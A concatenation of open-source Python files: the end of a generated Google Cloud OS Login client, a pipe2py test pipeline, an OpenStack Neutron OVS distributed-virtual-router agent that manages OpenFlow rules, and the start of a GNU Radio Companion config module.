on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Mask to control which fields get
updated. Updates all if not present.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.oslogin.common.common_pb2.SshPublicKey:
The SSH public key information
associated with a Google account.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name, ssh_public_key, update_mask])
if request is not None and has_flattened_params:
raise ValueError('If the `request` argument is set, then none of '
'the individual field arguments should be set.')
# Minor optimization to avoid making a copy if the user passes
        # in an oslogin.UpdateSshPublicKeyRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, oslogin.UpdateSshPublicKeyRequest):
request = oslogin.UpdateSshPublicKeyRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
if ssh_public_key is not None:
request.ssh_public_key = ssh_public_key
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.update_ssh_public_key]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
("name", request.name),
)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-oslogin",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = (
"OsLoginServiceClient",
)
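# A minimal usage sketch of the generated client (illustration only). It
# assumes Application Default Credentials are configured; the user e-mail and
# key fingerprint below are hypothetical placeholders.
#
#   from google.cloud.oslogin_v1beta import OsLoginServiceClient
#
#   client = OsLoginServiceClient()
#   key = client.get_ssh_public_key(
#       name="users/alice@example.com/sshPublicKeys/FINGERPRINT")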
|
satishgoda/pipe2py
|
refs/heads/master
|
tests/pypipelines/pipe_404411a8d22104920f3fc1f428f33642.py
|
6
|
# Pipe pipe_404411a8d22104920f3fc1f428f33642 generated by pipe2py
from pipe2py import Context
from pipe2py.modules.pipeforever import pipe_forever
from pipe2py.modules.pipefetch import pipe_fetch
from pipe2py.modules.pipefetch import pipe_fetch
from pipe2py.modules.pipecount import pipe_count
from pipe2py.modules.pipetruncate import pipe_truncate
from pipe2py.modules.pipeoutput import pipe_output
def pipe_404411a8d22104920f3fc1f428f33642(context=None, _INPUT=None, conf=None, **kwargs):
# todo: insert pipeline description here
conf = conf or {}
if context and context.describe_input:
return []
if context and context.describe_dependencies:
return [u'pipecount', u'pipefetch', u'pipeoutput', u'pipetruncate']
forever = pipe_forever()
sw_502 = pipe_fetch(
context, forever, conf={'URL': {'type': 'url', 'value': 'file://data/feeds.delicious.com_v2_rss_popular?count=15.xml'}})
sw_561 = pipe_fetch(
context, forever, conf={'URL': {'type': 'url', 'value': 'file://data/feeds.delicious.com_v2_rss_popular?count=3.xml'}})
sw_569 = pipe_count(
context, sw_561, conf={})
sw_583 = pipe_truncate(
context, sw_502, count=sw_569, conf={'count': {'terminal': 'count', 'type': 'number'}})
_OUTPUT = pipe_output(
context, sw_583, conf={})
return _OUTPUT
if __name__ == "__main__":
pipeline = pipe_404411a8d22104920f3fc1f428f33642(Context())
for i in pipeline:
print i
|
rdo-management/neutron
|
refs/heads/mgt-master
|
neutron/plugins/openvswitch/agent/ovs_dvr_neutron_agent.py
|
2
|
# Copyright 2014, Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import oslo_messaging
from oslo_utils import excutils
from neutron.api.rpc.handlers import dvr_rpc
from neutron.common import constants as n_const
from neutron.common import utils as n_utils
from neutron.i18n import _LE, _LI, _LW
from neutron.openstack.common import log as logging
from neutron.plugins.common import constants as p_const
from neutron.plugins.openvswitch.common import constants
LOG = logging.getLogger(__name__)
# A class to represent a DVR-hosted subnet including vif_ports resident on
# that subnet
class LocalDVRSubnetMapping(object):
def __init__(self, subnet, csnat_ofport=constants.OFPORT_INVALID):
        # set of compute ports on this dvr subnet
self.compute_ports = {}
self.subnet = subnet
self.csnat_ofport = csnat_ofport
self.dvr_owned = False
def __str__(self):
return ("subnet = %s compute_ports = %s csnat_port = %s"
" is_dvr_owned = %s" %
(self.subnet, self.get_compute_ofports(),
self.get_csnat_ofport(), self.is_dvr_owned()))
def get_subnet_info(self):
return self.subnet
def set_dvr_owned(self, owned):
self.dvr_owned = owned
def is_dvr_owned(self):
return self.dvr_owned
def add_compute_ofport(self, vif_id, ofport):
self.compute_ports[vif_id] = ofport
def remove_compute_ofport(self, vif_id):
self.compute_ports.pop(vif_id, 0)
def remove_all_compute_ofports(self):
self.compute_ports.clear()
def get_compute_ofports(self):
return self.compute_ports
def set_csnat_ofport(self, ofport):
self.csnat_ofport = ofport
def get_csnat_ofport(self):
return self.csnat_ofport
class OVSPort(object):
def __init__(self, id, ofport, mac, device_owner):
self.id = id
self.mac = mac
self.ofport = ofport
self.subnets = set()
self.device_owner = device_owner
def __str__(self):
return ("OVSPort: id = %s, ofport = %s, mac = %s,"
"device_owner = %s, subnets = %s" %
(self.id, self.ofport, self.mac,
self.device_owner, self.subnets))
def add_subnet(self, subnet_id):
self.subnets.add(subnet_id)
def remove_subnet(self, subnet_id):
self.subnets.remove(subnet_id)
def remove_all_subnets(self):
self.subnets.clear()
def get_subnets(self):
return self.subnets
def get_device_owner(self):
return self.device_owner
def get_mac(self):
return self.mac
def get_ofport(self):
return self.ofport
class OVSDVRNeutronAgent(dvr_rpc.DVRAgentRpcApiMixin):
'''
    Implements OVS-based DVR (Distributed Virtual Router) for overlay networks.
'''
# history
# 1.0 Initial version
def __init__(self, context, plugin_rpc, integ_br, tun_br,
bridge_mappings, phys_brs, int_ofports, phys_ofports,
patch_int_ofport=constants.OFPORT_INVALID,
patch_tun_ofport=constants.OFPORT_INVALID,
host=None, enable_tunneling=False,
enable_distributed_routing=False):
self.context = context
self.plugin_rpc = plugin_rpc
self.host = host
self.enable_tunneling = enable_tunneling
self.enable_distributed_routing = enable_distributed_routing
self.bridge_mappings = bridge_mappings
self.phys_brs = phys_brs
self.int_ofports = int_ofports
self.phys_ofports = phys_ofports
self.reset_ovs_parameters(integ_br, tun_br,
patch_int_ofport, patch_tun_ofport)
self.reset_dvr_parameters()
self.dvr_mac_address = None
if self.enable_distributed_routing:
self.get_dvr_mac_address()
def reset_ovs_parameters(self, integ_br, tun_br,
patch_int_ofport, patch_tun_ofport):
'''Reset the openvswitch parameters'''
self.int_br = integ_br
self.tun_br = tun_br
self.patch_int_ofport = patch_int_ofport
self.patch_tun_ofport = patch_tun_ofport
def reset_dvr_parameters(self):
'''Reset the DVR parameters'''
self.local_dvr_map = {}
self.local_csnat_map = {}
self.local_ports = {}
self.registered_dvr_macs = set()
def get_dvr_mac_address(self):
try:
self.get_dvr_mac_address_with_retry()
except oslo_messaging.RemoteError as e:
LOG.warning(_LW('L2 agent could not get DVR MAC address at '
'startup due to RPC error. It happens when the '
'server does not support this RPC API. Detailed '
'message: %s'), e)
except oslo_messaging.MessagingTimeout:
LOG.error(_LE('DVR: Failed to obtain a valid local '
'DVR MAC address - L2 Agent operating '
'in Non-DVR Mode'))
if not self.in_distributed_mode():
# switch all traffic using L2 learning
self.int_br.add_flow(table=constants.LOCAL_SWITCHING,
priority=1, actions="normal")
def get_dvr_mac_address_with_retry(self):
# Get the local DVR MAC Address from the Neutron Server.
# This is the first place where we contact the server on startup
# so retry in case it's not ready to respond
for retry_count in reversed(range(5)):
try:
details = self.plugin_rpc.get_dvr_mac_address_by_host(
self.context, self.host)
except oslo_messaging.MessagingTimeout as e:
with excutils.save_and_reraise_exception() as ctx:
if retry_count > 0:
ctx.reraise = False
LOG.warning(_LW('L2 agent could not get DVR MAC '
'address from server. Retrying. '
'Detailed message: %s'), e)
else:
LOG.debug("L2 Agent DVR: Received response for "
"get_dvr_mac_address_by_host() from "
"plugin: %r", details)
self.dvr_mac_address = details['mac_address']
return
def setup_dvr_flows_on_integ_br(self):
'''Setup up initial dvr flows into br-int'''
if not self.in_distributed_mode():
return
LOG.info(_LI("L2 Agent operating in DVR Mode with MAC %s"),
self.dvr_mac_address)
# Remove existing flows in integration bridge
self.int_br.remove_all_flows()
# Add a canary flow to int_br to track OVS restarts
self.int_br.add_flow(table=constants.CANARY_TABLE, priority=0,
actions="drop")
# Insert 'drop' action as the default for Table DVR_TO_SRC_MAC
self.int_br.add_flow(table=constants.DVR_TO_SRC_MAC,
priority=1,
actions="drop")
self.int_br.add_flow(table=constants.DVR_TO_SRC_MAC_VLAN,
priority=1,
actions="drop")
# Insert 'normal' action as the default for Table LOCAL_SWITCHING
self.int_br.add_flow(table=constants.LOCAL_SWITCHING,
priority=1,
actions="normal")
for physical_network in self.bridge_mappings:
self.int_br.add_flow(table=constants.LOCAL_SWITCHING,
priority=2,
in_port=self.int_ofports[physical_network],
actions="drop")
def setup_dvr_flows_on_tun_br(self):
'''Setup up initial dvr flows into br-tun'''
if not self.enable_tunneling or not self.in_distributed_mode():
return
self.tun_br.add_flow(priority=1,
in_port=self.patch_int_ofport,
actions="resubmit(,%s)" %
constants.DVR_PROCESS)
# table-miss should be sent to learning table
self.tun_br.add_flow(table=constants.DVR_NOT_LEARN,
priority=0,
actions="resubmit(,%s)" %
constants.LEARN_FROM_TUN)
self.tun_br.add_flow(table=constants.DVR_PROCESS,
priority=0,
actions="resubmit(,%s)" %
constants.PATCH_LV_TO_TUN)
def setup_dvr_flows_on_phys_br(self):
'''Setup up initial dvr flows into br-phys'''
if not self.in_distributed_mode():
return
for physical_network in self.bridge_mappings:
self.phys_brs[physical_network].add_flow(priority=2,
in_port=self.phys_ofports[physical_network],
actions="resubmit(,%s)" %
constants.DVR_PROCESS_VLAN)
self.phys_brs[physical_network].add_flow(priority=1,
actions="resubmit(,%s)" %
constants.DVR_NOT_LEARN_VLAN)
self.phys_brs[physical_network].add_flow(
table=constants.DVR_PROCESS_VLAN,
priority=0,
actions="resubmit(,%s)" %
constants.LOCAL_VLAN_TRANSLATION)
self.phys_brs[physical_network].add_flow(
table=constants.LOCAL_VLAN_TRANSLATION,
priority=2,
in_port=self.phys_ofports[physical_network],
actions="drop")
self.phys_brs[physical_network].add_flow(
table=constants.DVR_NOT_LEARN_VLAN,
priority=1,
actions="NORMAL")
def setup_dvr_mac_flows_on_all_brs(self):
if not self.in_distributed_mode():
LOG.debug("Not in distributed mode, ignoring invocation "
"of get_dvr_mac_address_list() ")
return
dvr_macs = self.plugin_rpc.get_dvr_mac_address_list(self.context)
LOG.debug("L2 Agent DVR: Received these MACs: %r", dvr_macs)
for mac in dvr_macs:
if mac['mac_address'] == self.dvr_mac_address:
continue
for physical_network in self.bridge_mappings:
self.int_br.add_flow(table=constants.LOCAL_SWITCHING,
priority=4,
in_port=self.int_ofports[physical_network],
dl_src=mac['mac_address'],
actions="resubmit(,%s)" %
constants.DVR_TO_SRC_MAC_VLAN)
self.phys_brs[physical_network].add_flow(
table=constants.DVR_NOT_LEARN_VLAN,
priority=2,
dl_src=mac['mac_address'],
actions="output:%s" %
self.phys_ofports[physical_network])
if self.enable_tunneling:
# Table 0 (default) will now sort DVR traffic from other
# traffic depending on in_port
self.int_br.add_flow(table=constants.LOCAL_SWITCHING,
priority=2,
in_port=self.patch_tun_ofport,
dl_src=mac['mac_address'],
actions="resubmit(,%s)" %
constants.DVR_TO_SRC_MAC)
# Table DVR_NOT_LEARN ensures unique dvr macs in the cloud
# are not learnt, as they may
# result in flow explosions
self.tun_br.add_flow(table=constants.DVR_NOT_LEARN,
priority=1,
dl_src=mac['mac_address'],
actions="output:%s" %
self.patch_int_ofport)
self.registered_dvr_macs.add(mac['mac_address'])
def dvr_mac_address_update(self, dvr_macs):
if not self.dvr_mac_address:
LOG.debug("Self mac unknown, ignoring this "
"dvr_mac_address_update() ")
return
dvr_host_macs = set()
for entry in dvr_macs:
if entry['mac_address'] == self.dvr_mac_address:
continue
dvr_host_macs.add(entry['mac_address'])
if dvr_host_macs == self.registered_dvr_macs:
LOG.debug("DVR Mac address already up to date")
return
dvr_macs_added = dvr_host_macs - self.registered_dvr_macs
dvr_macs_removed = self.registered_dvr_macs - dvr_host_macs
for oldmac in dvr_macs_removed:
for physical_network in self.bridge_mappings:
self.int_br.delete_flows(table=constants.LOCAL_SWITCHING,
in_port=self.int_ofports[physical_network],
dl_src=oldmac)
self.phys_brs[physical_network].delete_flows(
table=constants.DVR_NOT_LEARN_VLAN,
dl_src=oldmac)
if self.enable_tunneling:
self.int_br.delete_flows(table=constants.LOCAL_SWITCHING,
in_port=self.patch_tun_ofport,
dl_src=oldmac)
self.tun_br.delete_flows(table=constants.DVR_NOT_LEARN,
dl_src=oldmac)
LOG.debug("Removed DVR MAC flow for %s", oldmac)
self.registered_dvr_macs.remove(oldmac)
for newmac in dvr_macs_added:
for physical_network in self.bridge_mappings:
self.int_br.add_flow(table=constants.LOCAL_SWITCHING,
priority=4,
in_port=self.int_ofports[physical_network],
dl_src=newmac,
actions="resubmit(,%s)" %
constants.DVR_TO_SRC_MAC_VLAN)
self.phys_brs[physical_network].add_flow(
table=constants.DVR_NOT_LEARN_VLAN,
priority=2,
dl_src=newmac,
actions="output:%s" %
self.phys_ofports[physical_network])
if self.enable_tunneling:
self.int_br.add_flow(table=constants.LOCAL_SWITCHING,
priority=2,
in_port=self.patch_tun_ofport,
dl_src=newmac,
actions="resubmit(,%s)" %
constants.DVR_TO_SRC_MAC)
self.tun_br.add_flow(table=constants.DVR_NOT_LEARN,
priority=1,
dl_src=newmac,
actions="output:%s" %
self.patch_int_ofport)
LOG.debug("Added DVR MAC flow for %s", newmac)
self.registered_dvr_macs.add(newmac)
def in_distributed_mode(self):
return self.dvr_mac_address is not None
def is_dvr_router_interface(self, device_owner):
return device_owner == n_const.DEVICE_OWNER_DVR_INTERFACE
def process_tunneled_network(self, network_type, lvid, segmentation_id):
if self.in_distributed_mode():
table_id = constants.DVR_NOT_LEARN
else:
table_id = constants.LEARN_FROM_TUN
self.tun_br.add_flow(table=constants.TUN_TABLE[network_type],
priority=1,
tun_id=segmentation_id,
actions="mod_vlan_vid:%s,"
"resubmit(,%s)" %
(lvid, table_id))
def _bind_distributed_router_interface_port(self, port, lvm,
fixed_ips, device_owner):
# since router port must have only one fixed IP, directly
# use fixed_ips[0]
subnet_uuid = fixed_ips[0]['subnet_id']
csnat_ofport = constants.OFPORT_INVALID
ldm = None
if subnet_uuid in self.local_dvr_map:
ldm = self.local_dvr_map[subnet_uuid]
csnat_ofport = ldm.get_csnat_ofport()
if csnat_ofport == constants.OFPORT_INVALID:
LOG.error(_LE("DVR: Duplicate DVR router interface detected "
"for subnet %s"), subnet_uuid)
return
else:
# set up LocalDVRSubnetMapping available for this subnet
subnet_info = self.plugin_rpc.get_subnet_for_dvr(self.context,
subnet_uuid)
if not subnet_info:
LOG.error(_LE("DVR: Unable to retrieve subnet information "
"for subnet_id %s"), subnet_uuid)
return
LOG.debug("get_subnet_for_dvr for subnet %(uuid)s "
"returned with %(info)s",
{"uuid": subnet_uuid, "info": subnet_info})
ldm = LocalDVRSubnetMapping(subnet_info)
self.local_dvr_map[subnet_uuid] = ldm
# DVR takes over
ldm.set_dvr_owned(True)
table_id = constants.DVR_TO_SRC_MAC
vlan_to_use = lvm.vlan
if lvm.network_type == p_const.TYPE_VLAN:
table_id = constants.DVR_TO_SRC_MAC_VLAN
vlan_to_use = lvm.segmentation_id
subnet_info = ldm.get_subnet_info()
ip_version = subnet_info['ip_version']
local_compute_ports = (
self.plugin_rpc.get_ports_on_host_by_subnet(
self.context, self.host, subnet_uuid))
LOG.debug("DVR: List of ports received from "
"get_ports_on_host_by_subnet %s",
local_compute_ports)
for prt in local_compute_ports:
vif = self.int_br.get_vif_port_by_id(prt['id'])
if not vif:
continue
ldm.add_compute_ofport(vif.vif_id, vif.ofport)
if vif.vif_id in self.local_ports:
                # the compute port may already be on a different
                # dvr-routed subnet; if so, just record this
                # subnet against the existing port entry
comp_ovsport = self.local_ports[vif.vif_id]
comp_ovsport.add_subnet(subnet_uuid)
else:
                # this is the first time the compute port is seen on a
                # dvr-routed subnet; create its entry and record this subnet
comp_ovsport = OVSPort(vif.vif_id, vif.ofport,
vif.vif_mac, prt['device_owner'])
comp_ovsport.add_subnet(subnet_uuid)
self.local_ports[vif.vif_id] = comp_ovsport
# create rule for just this vm port
self.int_br.add_flow(table=table_id,
priority=4,
dl_vlan=vlan_to_use,
dl_dst=comp_ovsport.get_mac(),
actions="strip_vlan,mod_dl_src:%s,"
"output:%s" %
(subnet_info['gateway_mac'],
comp_ovsport.get_ofport()))
if lvm.network_type == p_const.TYPE_VLAN:
args = {'table': constants.DVR_PROCESS_VLAN,
'priority': 3,
'dl_vlan': lvm.vlan,
'actions': "drop"}
if ip_version == 4:
args['proto'] = 'arp'
args['nw_dst'] = subnet_info['gateway_ip']
else:
args['proto'] = 'icmp6'
args['icmp_type'] = n_const.ICMPV6_TYPE_RA
args['dl_src'] = subnet_info['gateway_mac']
# TODO(vivek) remove the IPv6 related add_flow once SNAT is not
# used for IPv6 DVR.
self.phys_brs[lvm.physical_network].add_flow(**args)
self.phys_brs[lvm.physical_network].add_flow(
table=constants.DVR_PROCESS_VLAN,
priority=2,
dl_vlan=lvm.vlan,
dl_dst=port.vif_mac,
actions="drop")
self.phys_brs[lvm.physical_network].add_flow(
table=constants.DVR_PROCESS_VLAN,
priority=1,
dl_vlan=lvm.vlan,
dl_src=port.vif_mac,
actions="mod_dl_src:%s,resubmit(,%s)" %
(self.dvr_mac_address, constants.LOCAL_VLAN_TRANSLATION))
if lvm.network_type in constants.TUNNEL_NETWORK_TYPES:
args = {'table': constants.DVR_PROCESS,
'priority': 3,
'dl_vlan': lvm.vlan,
'actions': "drop"}
if ip_version == 4:
args['proto'] = 'arp'
args['nw_dst'] = subnet_info['gateway_ip']
else:
args['proto'] = 'icmp6'
args['icmp_type'] = n_const.ICMPV6_TYPE_RA
args['dl_src'] = subnet_info['gateway_mac']
# TODO(vivek) remove the IPv6 related add_flow once SNAT is not
# used for IPv6 DVR.
self.tun_br.add_flow(**args)
self.tun_br.add_flow(table=constants.DVR_PROCESS,
priority=2,
dl_vlan=lvm.vlan,
dl_dst=port.vif_mac,
actions="drop")
self.tun_br.add_flow(table=constants.DVR_PROCESS,
priority=1,
dl_vlan=lvm.vlan,
dl_src=port.vif_mac,
actions="mod_dl_src:%s,resubmit(,%s)" %
(self.dvr_mac_address,
constants.PATCH_LV_TO_TUN))
# the dvr router interface is itself a port, so capture it
# queue this subnet to that port. A subnet appears only once as
# a router interface on any given router
ovsport = OVSPort(port.vif_id, port.ofport,
port.vif_mac, device_owner)
ovsport.add_subnet(subnet_uuid)
self.local_ports[port.vif_id] = ovsport
def _bind_port_on_dvr_subnet(self, port, lvm, fixed_ips,
device_owner):
# Handle new compute port added use-case
subnet_uuid = None
for ips in fixed_ips:
if ips['subnet_id'] not in self.local_dvr_map:
continue
subnet_uuid = ips['subnet_id']
ldm = self.local_dvr_map[subnet_uuid]
if not ldm.is_dvr_owned():
# well this is CSNAT stuff, let dvr come in
# and do plumbing for this vm later
continue
# This confirms that this compute port belongs
# to a dvr hosted subnet.
# Accommodate this VM Port into the existing rule in
# the integration bridge
LOG.debug("DVR: Plumbing compute port %s", port.vif_id)
subnet_info = ldm.get_subnet_info()
ldm.add_compute_ofport(port.vif_id, port.ofport)
if port.vif_id in self.local_ports:
                # the compute port may already be on a different
                # dvr-routed subnet; if so, just record this
                # subnet against the existing port entry
ovsport = self.local_ports[port.vif_id]
ovsport.add_subnet(subnet_uuid)
else:
                # this is the first time the compute port is seen on a
                # dvr-routed subnet; create its entry and record this subnet
ovsport = OVSPort(port.vif_id, port.ofport,
port.vif_mac, device_owner)
ovsport.add_subnet(subnet_uuid)
self.local_ports[port.vif_id] = ovsport
table_id = constants.DVR_TO_SRC_MAC
vlan_to_use = lvm.vlan
if lvm.network_type == p_const.TYPE_VLAN:
table_id = constants.DVR_TO_SRC_MAC_VLAN
vlan_to_use = lvm.segmentation_id
# create a rule for this vm port
self.int_br.add_flow(table=table_id,
priority=4,
dl_vlan=vlan_to_use,
dl_dst=ovsport.get_mac(),
actions="strip_vlan,mod_dl_src:%s,"
"output:%s" %
(subnet_info['gateway_mac'],
ovsport.get_ofport()))
def _bind_centralized_snat_port_on_dvr_subnet(self, port, lvm,
fixed_ips, device_owner):
if port.vif_id in self.local_ports:
# throw an error if CSNAT port is already on a different
# dvr routed subnet
ovsport = self.local_ports[port.vif_id]
subs = list(ovsport.get_subnets())
LOG.error(_LE("Centralized-SNAT port %s already seen on "),
port.vif_id)
LOG.error(_LE("a different subnet %s"), subs[0])
return
# since centralized-SNAT (CSNAT) port must have only one fixed
# IP, directly use fixed_ips[0]
subnet_uuid = fixed_ips[0]['subnet_id']
ldm = None
subnet_info = None
if subnet_uuid not in self.local_dvr_map:
# no csnat ports seen on this subnet - create csnat state
# for this subnet
subnet_info = self.plugin_rpc.get_subnet_for_dvr(self.context,
subnet_uuid)
ldm = LocalDVRSubnetMapping(subnet_info, port.ofport)
self.local_dvr_map[subnet_uuid] = ldm
else:
ldm = self.local_dvr_map[subnet_uuid]
subnet_info = ldm.get_subnet_info()
# Store csnat OF Port in the existing DVRSubnetMap
ldm.set_csnat_ofport(port.ofport)
# create ovsPort footprint for csnat port
ovsport = OVSPort(port.vif_id, port.ofport,
port.vif_mac, device_owner)
ovsport.add_subnet(subnet_uuid)
self.local_ports[port.vif_id] = ovsport
table_id = constants.DVR_TO_SRC_MAC
vlan_to_use = lvm.vlan
if lvm.network_type == p_const.TYPE_VLAN:
table_id = constants.DVR_TO_SRC_MAC_VLAN
vlan_to_use = lvm.segmentation_id
self.int_br.add_flow(table=table_id,
priority=4,
dl_vlan=vlan_to_use,
dl_dst=ovsport.get_mac(),
actions="strip_vlan,mod_dl_src:%s,"
" output:%s" %
(subnet_info['gateway_mac'],
ovsport.get_ofport()))
def bind_port_to_dvr(self, port, local_vlan_map,
fixed_ips, device_owner):
if not self.in_distributed_mode():
return
if local_vlan_map.network_type not in (constants.TUNNEL_NETWORK_TYPES
+ [p_const.TYPE_VLAN]):
LOG.debug("DVR: Port %s is with network_type %s not supported"
" for dvr plumbing" % (port.vif_id,
local_vlan_map.network_type))
return
if device_owner == n_const.DEVICE_OWNER_DVR_INTERFACE:
self._bind_distributed_router_interface_port(port,
local_vlan_map,
fixed_ips,
device_owner)
if device_owner and n_utils.is_dvr_serviced(device_owner):
self._bind_port_on_dvr_subnet(port, local_vlan_map,
fixed_ips,
device_owner)
if device_owner == n_const.DEVICE_OWNER_ROUTER_SNAT:
self._bind_centralized_snat_port_on_dvr_subnet(port,
local_vlan_map,
fixed_ips,
device_owner)
def _unbind_distributed_router_interface_port(self, port, lvm):
ovsport = self.local_ports[port.vif_id]
# removal of distributed router interface
subnet_ids = ovsport.get_subnets()
subnet_set = set(subnet_ids)
network_type = lvm.network_type
physical_network = lvm.physical_network
table_id = constants.DVR_TO_SRC_MAC
vlan_to_use = lvm.vlan
if network_type == p_const.TYPE_VLAN:
table_id = constants.DVR_TO_SRC_MAC_VLAN
vlan_to_use = lvm.segmentation_id
# ensure we process for all the subnets laid on this removed port
for sub_uuid in subnet_set:
if sub_uuid not in self.local_dvr_map:
continue
ldm = self.local_dvr_map[sub_uuid]
subnet_info = ldm.get_subnet_info()
ip_version = subnet_info['ip_version']
# DVR is no more owner
ldm.set_dvr_owned(False)
# remove all vm rules for this dvr subnet
# clear of compute_ports altogether
compute_ports = ldm.get_compute_ofports()
for vif_id in compute_ports:
comp_port = self.local_ports[vif_id]
self.int_br.delete_flows(table=table_id,
dl_vlan=vlan_to_use,
dl_dst=comp_port.get_mac())
ldm.remove_all_compute_ofports()
if ldm.get_csnat_ofport() == constants.OFPORT_INVALID:
# if there is no csnat port for this subnet, remove
# this subnet from local_dvr_map, as no dvr (or) csnat
# ports available on this agent anymore
self.local_dvr_map.pop(sub_uuid, None)
if network_type == p_const.TYPE_VLAN:
args = {'table': constants.DVR_PROCESS_VLAN,
'dl_vlan': lvm.vlan}
if ip_version == 4:
args['proto'] = 'arp'
args['nw_dst'] = subnet_info['gateway_ip']
else:
args['proto'] = 'icmp6'
args['icmp_type'] = n_const.ICMPV6_TYPE_RA
args['dl_src'] = subnet_info['gateway_mac']
                self.phys_brs[physical_network].delete_flows(**args)
if network_type in constants.TUNNEL_NETWORK_TYPES:
args = {'table': constants.DVR_PROCESS,
'dl_vlan': lvm.vlan}
if ip_version == 4:
args['proto'] = 'arp'
args['nw_dst'] = subnet_info['gateway_ip']
else:
args['proto'] = 'icmp6'
args['icmp_type'] = n_const.ICMPV6_TYPE_RA
args['dl_src'] = subnet_info['gateway_mac']
self.tun_br.delete_flows(**args)
ovsport.remove_subnet(sub_uuid)
if lvm.network_type == p_const.TYPE_VLAN:
            self.phys_brs[physical_network].delete_flows(
table=constants.DVR_PROCESS_VLAN,
dl_vlan=lvm.vlan,
dl_dst=port.vif_mac)
            self.phys_brs[physical_network].delete_flows(
table=constants.DVR_PROCESS_VLAN,
dl_vlan=lvm.vlan,
dl_src=port.vif_mac)
if lvm.network_type in constants.TUNNEL_NETWORK_TYPES:
self.tun_br.delete_flows(table=constants.DVR_PROCESS,
dl_vlan=lvm.vlan,
dl_dst=port.vif_mac)
self.tun_br.delete_flows(table=constants.DVR_PROCESS,
dl_vlan=lvm.vlan,
dl_src=port.vif_mac)
# release port state
self.local_ports.pop(port.vif_id, None)
def _unbind_port_on_dvr_subnet(self, port, lvm):
ovsport = self.local_ports[port.vif_id]
# This confirms that this compute port being removed belonged
# to a dvr hosted subnet.
LOG.debug("DVR: Removing plumbing for compute port %s", port)
subnet_ids = ovsport.get_subnets()
# ensure we process for all the subnets laid on this port
for sub_uuid in subnet_ids:
if sub_uuid not in self.local_dvr_map:
continue
ldm = self.local_dvr_map[sub_uuid]
ldm.remove_compute_ofport(port.vif_id)
table_id = constants.DVR_TO_SRC_MAC
vlan_to_use = lvm.vlan
if lvm.network_type == p_const.TYPE_VLAN:
table_id = constants.DVR_TO_SRC_MAC_VLAN
vlan_to_use = lvm.segmentation_id
# first remove this vm port rule
self.int_br.delete_flows(table=table_id,
dl_vlan=vlan_to_use,
dl_dst=ovsport.get_mac())
# release port state
self.local_ports.pop(port.vif_id, None)
def _unbind_centralized_snat_port_on_dvr_subnet(self, port, lvm):
ovsport = self.local_ports[port.vif_id]
# This confirms that this compute port being removed belonged
# to a dvr hosted subnet.
LOG.debug("DVR: Removing plumbing for csnat port %s", port)
sub_uuid = list(ovsport.get_subnets())[0]
# ensure we process for all the subnets laid on this port
if sub_uuid not in self.local_dvr_map:
return
ldm = self.local_dvr_map[sub_uuid]
ldm.set_csnat_ofport(constants.OFPORT_INVALID)
table_id = constants.DVR_TO_SRC_MAC
vlan_to_use = lvm.vlan
if lvm.network_type == p_const.TYPE_VLAN:
table_id = constants.DVR_TO_SRC_MAC_VLAN
vlan_to_use = lvm.segmentation_id
# then remove csnat port rule
self.int_br.delete_flows(table=table_id,
dl_vlan=vlan_to_use,
dl_dst=ovsport.get_mac())
if not ldm.is_dvr_owned():
# if not owned by DVR (only used for csnat), remove this
# subnet state altogether
self.local_dvr_map.pop(sub_uuid, None)
# release port state
self.local_ports.pop(port.vif_id, None)
def unbind_port_from_dvr(self, vif_port, local_vlan_map):
if not self.in_distributed_mode():
return
# Handle port removed use-case
if vif_port and vif_port.vif_id not in self.local_ports:
LOG.debug("DVR: Non distributed port, ignoring %s", vif_port)
return
ovsport = self.local_ports[vif_port.vif_id]
device_owner = ovsport.get_device_owner()
if device_owner == n_const.DEVICE_OWNER_DVR_INTERFACE:
self._unbind_distributed_router_interface_port(vif_port,
local_vlan_map)
if device_owner and n_utils.is_dvr_serviced(device_owner):
self._unbind_port_on_dvr_subnet(vif_port,
local_vlan_map)
if device_owner == n_const.DEVICE_OWNER_ROUTER_SNAT:
self._unbind_centralized_snat_port_on_dvr_subnet(vif_port,
local_vlan_map)
|
n-west/gnuradio
|
refs/heads/maint
|
grc/gui/Config.py
|
18
|
"""
Copyright 2016 Free Software Foundation, Inc.
This file is part of GNU Radio
GNU Radio Companion is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
GNU Radio Companion is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
"""
import sys
import os
from ..core.Config import Config as _Config
from . import Constants
class Config(_Config):
name = 'GNU Radio Companion'
gui_prefs_file = os.environ.get(
'GRC_PREFS_PATH', os.path.expanduser('~/.gnuradio/grc.conf'))
